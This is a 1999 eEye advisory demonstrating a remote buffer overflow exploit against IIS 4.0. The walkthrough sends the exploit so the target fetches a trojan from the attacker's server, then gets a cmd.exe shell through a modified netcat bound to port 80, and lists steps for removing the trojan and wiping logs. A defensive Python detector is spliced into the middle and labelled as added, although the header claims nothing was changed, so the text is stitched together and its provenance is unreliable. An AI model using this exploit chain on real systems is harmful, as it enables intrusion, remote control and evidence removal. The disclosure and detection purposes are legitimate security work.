    DOCUMENT TAKEN AS IS FROM eEye.com WEB SITE - NOTHING HAS BEEN CHANGED



                     Retina vs. IIS4, Round 2 - The Exploit


Note: Now that we have proven the severity of this advisory, we no longer feel
that it is necessary to distribute the exploit in binary form. However, the
source code is still available for download.


  We contemplated releasing this exploit and decided to do it after Microsoft
neglected to give it the attention it deserves. After the fifth day of reporting
the bug to Microsoft, they stopped responding to our e-mails. On the 8th day we
felt that it was our duty to make our voice heard.


 Here Is Why.
We are a full disclosure security team, and we were not working under any
non-disclosure agreements with anyone. Our responsibility to our clients and the
whole network community is to disclose as many details as possible. This is how
other developers can pick up where we stopped and explore the exploit in different
directions; this is the way we can contribute to the security community and keep
software vendors working hard at producing more robust products. This exploit
demonstrates the seriousness of the hole. YES, this is a very serious hole and
needs to be given the attention it deserves. If our team starts hiding the facts,
we'll be no better than a software vendor that rushes insecure products to market.
So here it goes...

 The Target:

Let's say for this example we are targeting some random Fortune 500 company. Take
your pick. We want to pretend this company has some "state of the art" security.
They are locked down behind a Cisco PIX and are being watched with the best of
Intrusion Detection software. The server only allows inbound connections to port
80.

 Let's Dance.

We've crafted our exploit to overflow the remote machine and download and execute
a trojan from our web server. The trojan we are using for this example is
ncx.exe. Ncx.exe is a hacked-up version of netcat.exe. The hacked-up part of this
netcat is that it always passes -l -p 80 -t -e cmd.exe as its arguments. That
basically means netcat is always going to bind cmd.exe to port 80. The exe has
also been packed slightly to make it smaller: instead of a 50k footprint it's 31k.
So we run our exploit:


   X:\Code>iishack example.com 80 ourserver.com/ncx.exe
   ------(IIS 4.0 remote buffer overflow exploit)-----------------
   (c) dark spyrit -- barns@eeye.com.
   http://www.eEye.com

   [usage: iishack <host> <port> <url> ]
   eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
   do not include 'http://' before hosts!
   ---------------------------------------------------------------

   Data sent!

   Note: Give it enough time to download your trojan.

   X:\Code>telnet example.com 80

   Microsoft(R) Windows NT(TM)
   (C) Copyright 1985-1996 Microsoft Corp.

   C:\>[You have full access to the system, happy browsing :)]
   C:\>[Add a scheduled task to restart inetinfo in X minutes]
   C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]
   C:\>[Clean up any trace or logs we might have left behind.]
   C:\>exit

Note: Once we type exit in the telnet session our trojan exe, ncx.exe, is unloaded
and is no longer listening on port 80. Therefore the web service can restart and
everything can seem back to normal. Now, the example above was a somewhat quick
demonstration of how this could be used. Some things were left out because this
advisory is big enough as it is.
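The window a defender has here is the one the advisory just described: between the overflow and the moment the intruder types exit, port 80 is served by ncx.exe rather than by inetinfo.exe, and the real web server is not running at all. The following check, an added example that is not eEye's code and not part of the original advisory, turns that observation into a host-side detection. It parses a constructed netstat-style listener table (not output captured from any real host) together with a constructed PID-to-image map, and reports any port-80 listener whose owner is not the expected web server image, plus the case where the web server image is absent entirely. The process names and PIDs in the sample are made up for the example.

```python
"""Detect a port-80 listener that is not the web server (added example).

Assumption: a netstat-style table with a trailing PID column and a
PID-to-process-name map are available; both samples below are constructed.
"""
from typing import Dict, List, NamedTuple


class Listener(NamedTuple):
    proto: str
    address: str
    port: int
    pid: int


# Constructed sample in the shape of a netstat listing with a PID column.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1188
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       412
  TCP    10.0.0.5:1043          203.0.113.9:80         ESTABLISHED     1188
  UDP    0.0.0.0:161            *:*                                    388
"""

# Constructed PID-to-image map, as a process list would give it.
SAMPLE_PROCESSES: Dict[int, str] = {1188: "ncx.exe", 412: "rpcss.exe", 388: "snmp.exe"}


def parse_listeners(text: str) -> List[Listener]:
    """Return the TCP sockets in LISTENING state from a netstat-style table.

    TCP rows have five fields (proto, local, foreign, state, pid); UDP rows
    have no state column and the header has seven fields, so both are skipped.
    """
    found: List[Listener] = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        addr, _, port = fields[1].rpartition(":")
        found.append(Listener(fields[0], addr, int(port), int(fields[4])))
    return found


def find_rogue_listeners(listeners: List[Listener], processes: Dict[int, str],
                         expected: str = "inetinfo.exe", ports=(80,)) -> List[dict]:
    """Report listeners on the web ports owned by anything but the web server.

    A listener whose PID has no entry in the process map is reported as well:
    a socket with no visible owner is a finding, not a pass.
    """
    rogue = []
    for lst in listeners:
        if lst.port not in ports:
            continue
        owner = processes.get(lst.pid, "<unknown>")
        if owner.lower() != expected.lower():
            rogue.append({"port": lst.port, "pid": lst.pid, "process": owner})
    return rogue


def web_server_missing(processes: Dict[int, str], expected: str = "inetinfo.exe") -> bool:
    """True when the expected web server image is not running at all."""
    return expected.lower() not in {name.lower() for name in processes.values()}


if __name__ == "__main__":
    listeners = parse_listeners(SAMPLE_NETSTAT)
    for hit in find_rogue_listeners(listeners, SAMPLE_PROCESSES):
        print(f"port {hit['port']} served by {hit['process']} (pid {hit['pid']})")
    if web_server_missing(SAMPLE_PROCESSES):
        print("inetinfo.exe is not running: web service crashed or replaced")
```

The check is deliberately keyed on the owning process rather than on the port being open, because from the outside port 80 looks normal the whole time; only the image behind it changes. Run against the constructed sample it flags port 80 owned by ncx.exe (pid 1188) and reports inetinfo.exe as absent, which is exactly the state of the box during the session shown above.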

  Special Thanks

Goes to professor barns@eeye.com for coding this exploit and demonstrating his
Kung Fu style.

Copyright (c) 1999 eEye Digital Security Team

Permission is hereby granted for the redistribution of this alert electronically.
It is not to be edited in any way without express consent of eEye. If you wish to
reprint the whole or any part of this alert in any other medium excluding
electronic medium, please e-mail alert@eEye.com for permission.

  Disclaimer:

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no event shall the author be liable
for any damages whatsoever arising out of or in connection with the use or spread
of this information. Any use of this information is at the user's own risk.

Please send suggestions, updates, and comments to:

  eEye Digital Security Team

   info@eEye.com
   www.eEye.com



             Copyright 1998-1999 eEye.com - All Rights Reserved. eEye
                          is an [www.eCompany.com] Venture.


